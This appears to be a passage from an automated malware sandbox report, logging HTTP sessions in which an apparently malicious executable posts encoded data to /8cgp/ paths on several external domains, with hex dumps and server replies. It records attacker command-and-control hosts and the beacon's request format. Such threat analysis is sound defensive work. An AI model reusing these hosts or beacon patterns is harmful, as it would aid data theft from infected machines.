                                                                    Data Ascii: Xh9lX=5pmLN48gKrEf6qjnFhr1bhObs9wyjeSieQHJ485TDRh2Gzyj2YfBQ18CflEMowCW83dD/tF9b7Su8YNaiQoWcsmB88J6+iy86ABdnV2aYps0g+xf5rWLCv+ndsqvBRmQfvRU32SBhWXTvl8eSJo140KzcIqCazWTgHq41oCu+EMMcwhSRi8D+xlYhTC6Kc4AsebSGIH+vUMLIixSRvpwl+1eTovfuOd0+l5jMaqA4JNjJ6zFvF2LjdpYzW9+AHIu3VUUwZ7y4PAb7GFDmd6OOwpqgO8EnF20FAr/4Cl/GcMeY5rD8FoY66vz0u0u+kqkCuZ41PuGV8tCDtwp+Hm9cuVqQHpBjYfIBPhAZXAD16E02g9XzOvnPNrGMVHPgzyboiOKkiNB63bJgYg0CeDB6CVLnW5trNA/dZvGih5BelkKLWwp+IhfyMYZwACsZeOwSj4vcrmm5wVSOYK+aJLb/kbzwoVnPXVMb0HsDKxCYaAR9FBU4965foSMhYyWVw50FV8lSsJtnj7W11I+Z5p3ayM=
                                                                    Apr 24, 2024 12:28:23.988703966 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:28:23 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.11.205024864.190.62.22807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:28:26.524324894 CEST12890OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 35 70 6d 4c 4e 34 38 67 4b 72 45 66 36 71 6a 6e 46 68 72 31 62 68 4f 62 73 39 77 79 6a 65 53 69 65 51 48 4a 34 38 35 54 44 51 31 32 47 43 53 6a 32 37 33 42 52 31 38 43 44 31 45 4a 6f 77 43 75 38 33 46 48 2f 74 35 74 62 35 71 75 38 50 42 61 69 69 51 57 4b 38 6d 41 35 38 4a 72 36 69 79 67 36 41 64 33 6e 56 53 4b 59 5a 49 30 6e 39 5a 66 6f 73 36 49 4d 66 2b 68 64 73 72 67 51 42 6d 79 66 76 56 45 33 32 4f 42 68 54 66 54 39 6e 30 65 52 59 6f 31 73 55 4b 79 4b 34 71 52 55 6a 57 36 67 48 75 4b 31 6f 44 56 2b 42 73 4d 63 79 5a 53 51 67 55 45 77 78 6c 59 36 54 44 73 4f 63 6b 45 73 65 48 4b 47 49 44 2b 76 55 30 4c 61 79 78 53 61 74 52 7a 69 65 31 63 65 49 75 66 71 4f 51 37 2b 6b 5a 33 4d 65 36 41 34 34 70 6a 62 39 6e 46 74 6b 32 4c 74 64 70 61 75 47 38 69 4b 6e 4a 78 33 56 46 2f 77 5a 62 45 34 4d 4d 62 36 6e 4a 44 32 4d 36 4e 49 51 6f 68 2b 65 38 72 32 56 71 6f 46 41 37 64 34 43 6c 57 47 65 67 65 59 4b 7a 44 39 41 55 66 37 4b 76 77 68 2b 30 37 70 31 57 75 43 75 74 67 31 50 4b 57 56 2f 42 43 46 4e 77 70 37 6b 2b 2b 57 65 56 74 53 48 6f 47 74 34 65 58 42 50 39 32 5a 53 68 34 79 4c 6f 30 32 51 74 58 30 65 76 6d 66 39 72 4b 44 31 48 56 32 44 79 62 6f 69 43 65 6b 69 42 42 36 6d 6a 4a 67 76 45 30 41 4e 62 42 38 43 56 33 6e 57 34 72 72 4e 63 32 64 5a 6e 34 69 6c 38 75 65 67 30 4b 4c 48 67 70 39 4b 4a 63 30 38 59 57 30 41 43 64 47 75 4b 72 53 6a 4d 33 63 72 32 59 35 41 70 53 55 59 61 2b 65 4a 4c 59 39 45 62 30 7a 6f 56 78 4c 58 70 51 62 30 71 62 44 4c 45 4a 59 59 41 52 2f 51 6b 57 71 64 6d 62 4a 35 48 62 70 61 69 53 62 42 68 47 4c 47 45 4f 65 76 31 79 74 54 6d 47 35 58 41 2b 64 72 74 43 42 53 73 46 4f 61 45 79 56 72 4f 63 74 58 5a 32 62 67 58 4b 34 46 4e 4f 66 62 64 62 61 39 44 71 6b 68 57 65 64 34 56 72 43 54 4b 38 32 4d 63 43 33 61 39 37 34 4d 73 4e 6d 66 39 6e 74 39 64 49 46 47 74 34 6a 71 58 6a 68 39 72 34 66 2b 6a 4b 4c 58 33 55 30 47 30 61 6d 56 73 73 43 6b 6b 62 5a 4e 51 2f 6f 35 57 75 78 51 71 4a 36 6a 5a 67 33 2b 36 4d 41 53 50 68 71 55 65 48 4f 42 65 66 68 77 35 68 46 61 59 52 49 69 50 45 49 42 59 53 2b 42 6e 79 65 49 53 33 44 48 66 6f 75 63 64 68 58 79 4b 4b 69 4b 70 38 38 64 6a 37 4a 4b 38 41 76 69 52 2b 36 31 77 33 50 2f 79 4b 46 6a 2b 4d 48 5a 5a 6f 2b 79 43 69 36 6a 68 61 6c 46 37 75 5a 62 75 61 32 69 45 7a 32 78 6d 66 61 38 70 4a 43 6f 73 71 65 50 33 4f 2f 50 67 32 72 4e 51 51 38 35 78 77 6a 49 46 51 72 6a 75 58 2b 58 62 63 46 59 46 66 75 53 49 73 4e 51 6d 31 6a 49 36 61 35 5a 66 32 70 75 32 53 50 62 61 63 74 53 36 78 65 64 76 50 50 37 6d 79 46 30 52 35 66 56 41 49 55 6e 33 58 64 41 31 33 71 39 70 6c 44 6b 72 6b 58 75 47 6d 35 48 72 55 57 30 68 69 2f 55 4a 6d 72 52 55 69 4a 72 42 73 50 69 30 73 30 6f 53 64 61 6c 64 7a 71 6f 4e 6f 6b 2f 5a 31 6e 73 63 39 77 67 6b 4f 36 58 31 6d 6d 54 2b 42 52 7a 6e 6f 30 57 53 34 32 43 58 39 37 59 69 56 50 57 7a 6b 4a 73 63 54 68 72 31 79 58 31 4d 6f 38 74 62 6e 4e 38 47 33 75 4a 61 66 76 58 67 78 78 6d 65 45 37 4d 4d 6b 38 69 63 55 41 71 6c 6c 31 48 41 36 68 39 71 39 4e 4d 37 41 6a 79 4d 74 72 6f 4c 68 47 77 36 36 2f 34 4e 53 52 72 42 32 67 69 33 65 55 4c 4a 6a 72 6c 59 6e 4e 2f 2b 65 55 47 4e 4a 4d 4d 67 70 7a 68 65 55 67 37 65 51 37 4a 79 7a 37 62 61 57 58 32 44 42 42 64 66 58 32 44 38 57 65 47 6d 79 64 66 78 79 62 2b 77 32 62 6d 68 75 7a 70 51 73 53 55 79 74 68 71 79 69 73 2b 52 74 7a 79 54 66 4e 6b 6e 66 31 44 2f 6b 6a 73 74 32 37 34 70 69 56 54 33 78 4e 4e 2b 65 32 51 6d 6f 46 69 6e 67 61 41 76 76 62 35 78 36 55 73 77 4e 4c 4c 64 45 75 59 42 49 42 4e 61 34 4e 61 62 6f 31 53 75 73 32 42 66 76 6d 53 7a 31 58 30 6e 52 2f 4f 62 79 43 2b 4c 6b 78 4b 45 46 4f 79 47 46 57 68 77 50 76 4f 34 69 58 59 49 69 4e 36 6d 6a 78 56 53 48 71 55 6e 78 63 32 4a 62 76 39 43 57 64 68 72 54 42 53 6c 4f 4e 72 66 79 30 46 77 35 44 47 7a 39 77 53 61 67 74 7a 69 44 4d 75 75 44 49 64 2b 53 62 70 6b 4b 6d 62 32 68 33 75 53 48 74 6a 44 4b 54 76 74 68 39 49 5a 59 65 74 59 42 38 30 7a 64 69 30 75 4c 62 77 41 45 38 44 50 34 51 41 73 2f 4d 46 65 75 42 6b 62 70 4d 4c 66 56 32 63 55 6e 37 75 69 62 47 52 6f 66 79 51 6c 49 6d 67 46 4b 6d 36 78 6c 35 79 36 4f 44 75 32 56 70 67 4f 69 38 2f 4b 55 61
                                                                    Data Ascii: Xh9lX=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
                                                                    Apr 24, 2024 12:28:26.838046074 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:28:26 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                    Apr 24, 2024 12:28:26.838108063 CEST2578OUTData Raw: 59 71 30 74 74 2f 74 42 33 47 55 49 7a 76 7a 37 51 35 46 4f 49 7a 59 63 34 74 61 6e 39 6f 6e 69 32 69 41 38 64 39 52 43 55 43 49 71 4c 4c 55 34 44 47 39 52 32 53 30 73 76 5a 68 67 70 52 49 4b 2f 78 47 59 6f 61 67 33 46 38 73 47 4d 4a 61 73 47 43
                                                                    Data Ascii: Yq0tt/tB3GUIzvz7Q5FOIzYc4tan9oni2iA8d9RCUCIqLLU4DG9R2S0svZhgpRIK/xGYoag3F8sGMJasGCcOHRug9iLM/HjMszNPd7L+NxlwOpMv/f0bBo+/ShQiTsxFagG1nps3TG4FgQWdaY/KYGBgPVhIAjLeepJvpMu8HP2GiJMZqTfnjOk8860zWyoYYf4ARRjy5JAkug8lRehSO0KQukTvZDlb3+oC4rUvmY6ff/rmKAV
                                                                    Apr 24, 2024 12:28:26.838172913 CEST5156OUTData Raw: 36 4e 47 31 73 49 73 52 5a 31 45 59 50 5a 78 75 41 6b 72 47 52 78 41 38 50 32 6f 71 50 75 4e 64 61 76 4f 4d 50 77 4d 36 4f 72 72 45 6c 63 4d 6d 72 74 31 6e 49 4e 35 38 72 4c 4b 72 64 56 5a 4c 37 6d 53 6c 63 62 37 53 59 41 48 6e 4e 47 56 30 2f 48
                                                                    Data Ascii: 6NG1sIsRZ1EYPZxuAkrGRxA8P2oqPuNdavOMPwM6OrrElcMmrt1nIN58rLKrdVZL7mSlcb7SYAHnNGV0/H3qp4ic9vjTzBLNwQve95GeRBuEPeEvzPXg2odwSF+/WTxbUiGLt2UPwizQS0SijFRH3cd372dhOtYaSClKw9rhXJ11mALhD3XvMXkNJZ3rojaRY0kIWN7HtOC1PNhb/JZMmfbsqTXNuGvlXMqzc6gqXHp18bbh5fQ
                                                                    Apr 24, 2024 12:28:26.838218927 CEST2578OUTData Raw: 6a 53 56 51 31 71 30 51 6f 79 7a 72 4f 61 31 38 79 7a 4f 56 38 6f 45 30 46 48 74 69 6f 51 4d 49 4d 51 49 63 58 56 48 41 4b 62 33 64 32 61 39 68 68 65 38 35 6f 79 57 6a 7a 43 74 6a 50 39 57 44 73 49 4b 4e 43 73 38 62 31 41 6e 70 41 79 51 56 31 6a
                                                                    Data Ascii: jSVQ1q0QoyzrOa18yzOV8oE0FHtioQMIMQIcXVHAKb3d2a9hhe85oyWjzCtjP9WDsIKNCs8b1AnpAyQV1js7vEbnGW0aItYng6pJFhdnL5FvwhFyEYhaZxUnp2SKlFhszjroJy9jnvWPqMtFEm4iCPTvd42NAmj8L0gAimn1o42dS2XAz91lPc1eqscxZxd8p4VZI80pINk8c0+EUGQ8V2arbvWhQofPoPVUzQ1BVbQsvTYfAt2
                                                                    Apr 24, 2024 12:28:26.838572025 CEST9023OUTData Raw: 69 2f 76 78 38 48 6c 6d 6a 48 49 4d 61 37 32 4f 2f 70 65 6e 7a 45 45 43 7a 6f 6a 4a 38 30 73 51 34 6c 2b 69 41 62 61 50 6a 73 4e 57 38 42 51 44 63 6b 74 2f 68 49 68 55 6c 53 59 47 2f 6c 51 51 4e 6e 33 32 53 56 42 69 53 47 52 30 41 6c 36 63 38 66
                                                                    Data Ascii: i/vx8HlmjHIMa72O/penzEECzojJ80sQ4l+iAbaPjsNW8BQDckt/hIhUlSYG/lQQNn32SVBiSGR0Al6c8fv816FrBqN9bFz5JhsS2ZiZWjThPCUf1VZoWWPMojsYWaASKw+0A4bi1W2O8wLbdfLR1BPjDm78V5gNMrrlJnJzfK8bUKqikV/pj/HFjpbZUidkQoEmBXz+Qr7NQvKHZ2cvhh2ZjHB2wzle5hvFC/JWKgpf9Mav3Mn
                                                                    Apr 24, 2024 12:28:26.838733912 CEST6445OUTData Raw: 4d 69 57 46 31 7a 36 6e 46 55 59 2f 59 4a 5a 37 73 61 65 44 54 63 77 49 49 54 79 76 6a 77 36 4e 51 31 51 6c 63 34 4e 53 58 38 37 43 44 63 66 63 44 4e 45 57 72 39 69 54 39 66 76 68 31 62 6b 69 50 38 51 55 68 78 4c 42 4e 77 6a 4e 4e 78 31 31 6e 33
                                                                    Data Ascii: MiWF1z6nFUY/YJZ7saeDTcwIITyvjw6NQ1Qlc4NSX87CDcfcDNEWr9iT9fvh1bkiP8QUhxLBNwjNNx11n35pv/Y3NBTHsLCFHIaExofgrM7MTN+1mGVM5xudzG00n9I4eYW62hRBq3zz8dGFXlj1THj/MTB1ioxzgmF7c5mcADGDMLW3+yhaq4b+VUOqInKTnQACUYQgOu+ovpHiZY8Ytbt1mb6V1ZDrRD8gmEEQOy7V3Eg4uHO
                                                                    Apr 24, 2024 12:28:27.152008057 CEST2578OUTData Raw: 64 72 45 35 6c 61 50 65 6f 2b 32 4d 4f 72 71 50 43 63 5a 6f 7a 77 59 31 36 4a 67 42 34 48 39 53 48 43 77 63 62 31 4b 65 4e 6c 4a 70 6f 58 73 75 2b 69 41 52 57 4f 6a 57 34 6c 2f 2f 6c 6f 53 46 7a 49 4e 49 57 66 33 56 58 6b 36 38 6f 77 7a 55 53 6e
                                                                    Data Ascii: drE5laPeo+2MOrqPCcZozwY16JgB4H9SHCwcb1KeNlJpoXsu+iARWOjW4l//loSFzINIWf3VXk68owzUSnaHuBtUhbnsj7BJjTcUFfx+MlhHY4WoZi755Hgqh7A+XnE1c3RYrpRsIAKt6l/+qRDOlLIRjDbWRAMlIZ9t1DE+9xSlGiwSmbvNUkVb8WvwEPkp1xi1/IP0kKt5H9vSZkU4erknbVH6q4KnWyNMdRL9gUblh3jUYXR
                                                                    Apr 24, 2024 12:28:27.152061939 CEST5156OUTData Raw: 58 4f 6f 76 58 34 4c 77 65 79 7a 65 39 33 56 2b 48 57 6d 77 39 72 73 4b 51 57 37 75 4e 32 6d 54 5a 4d 6d 39 74 54 52 58 64 74 53 47 68 42 58 43 4b 31 36 43 34 59 43 62 73 56 47 30 6c 42 4d 73 44 62 56 5a 6c 49 41 54 74 6e 51 32 55 6d 74 67 43 39
                                                                    Data Ascii: XOovX4Lweyze93V+HWmw9rsKQW7uN2mTZMm9tTRXdtSGhBXCK16C4YCbsVG0lBMsDbVZlIATtnQ2UmtgC9K0VZass3EbmQMBf4+ROGESVm07B/eKsjTPICRmi1iizhcONkQXl/Uf3+TiLWQJqAxtaH52erEEbkC5/Uko12r077SJCOixYIXg3g3FYduaOAS5Y+ALeO7d4+doNTUsCh0u8NyBZohTjFj4MIdHHGMU+hnZWtGvszT
                                                                    Apr 24, 2024 12:28:27.152120113 CEST7012OUTData Raw: 6f 48 62 41 30 55 52 56 69 64 35 54 4e 2b 62 53 57 5a 6c 6e 38 4d 44 68 6d 6e 59 48 62 69 7a 54 47 2f 55 42 45 73 39 35 75 36 32 58 78 46 34 34 59 67 52 6d 33 32 48 76 66 4a 39 74 52 50 65 35 6a 73 53 4c 76 6c 35 6b 54 30 57 44 54 73 4a 74 61 71
                                                                    Data Ascii: oHbA0URVid5TN+bSWZln8MDhmnYHbizTG/UBEs95u62XxF44YgRm32HvfJ9tRPe5jsSLvl5kT0WDTsJtaqlGzx8rG1445gOCG9PtCpVyiGQfli7JjZR9/1VBbJVyiB2PomLN+dE8feyadSsVNtgXxsZeZwCnbtYo4hRNlUMSV8jU7A5J3lJUw0HcjQD7TnpZpZZJ0OD2UESFniy7MnG1vqQjqfCpkHzWB2Asx2T5+AuFyjuWGwv


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.11.205024964.190.62.22807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:28:29.363822937 CEST398OUTGET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.donantedeovulos.space
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:28:29.675548077 CEST107INHTTP/1.1 439
                                                                    date: Wed, 24 Apr 2024 10:28:29 GMT
                                                                    content-length: 0
                                                                    server: NginX
                                                                    connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.11.2050250108.186.8.155807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:28:52.014128923 CEST656OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 65 70 2b 6f 6c 39 5a 39 2f 59 33 51 4e 44 74 2f 43 73 78 44 4f 6d 2b 4d 77 33 66 6e 54 52 57 76 37 48 6d 6e 6a 44 69 54 36 57 70 33 75 71 39 6b 49 62 73 45 71 55 50 61 72 4d 66 6f 67 69 55 4c 37 30 70 42 69 4d 48 54 4c 4b 34 46 50 50 65 4f 42 72 48 2f 37 78 4b 59 7a 43 4a 4e 75 49 48 78 75 33 67 2f 71 45 56 55 77 61 46 64 50 51 2b 75 6b 74 6c 31 50 47 78 33 48 57 65 51 46 6c 52 70 43 57 44 57 64 63 57 6c 68 77 76 74 69 73 57 6c 53 67 76 31 53 41 32 33 2b 78 2b 73 62 35 67 54 42 5a 71 64 67 50 32 41 53 30 56 78 70 46 44 35 6d 65 6b 50 78 33 55 4d 43 32 58 41 65 53 70 30 43 41 3d 3d
                                                                    Data Ascii: Xh9lX=ep+ol9Z9/Y3QNDt/CsxDOm+Mw3fnTRWv7HmnjDiT6Wp3uq9kIbsEqUParMfogiUL70pBiMHTLK4FPPeOBrH/7xKYzCJNuIHxu3g/qEVUwaFdPQ+uktl1PGx3HWeQFlRpCWDWdcWlhwvtisWlSgv1SA23+x+sb5gTBZqdgP2AS0VxpFD5mekPx3UMC2XAeSp0CA==
                                                                    Apr 24, 2024 12:28:52.193074942 CEST240INHTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:28:51 GMT
                                                                    Connection: close
                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                    Data Ascii: a
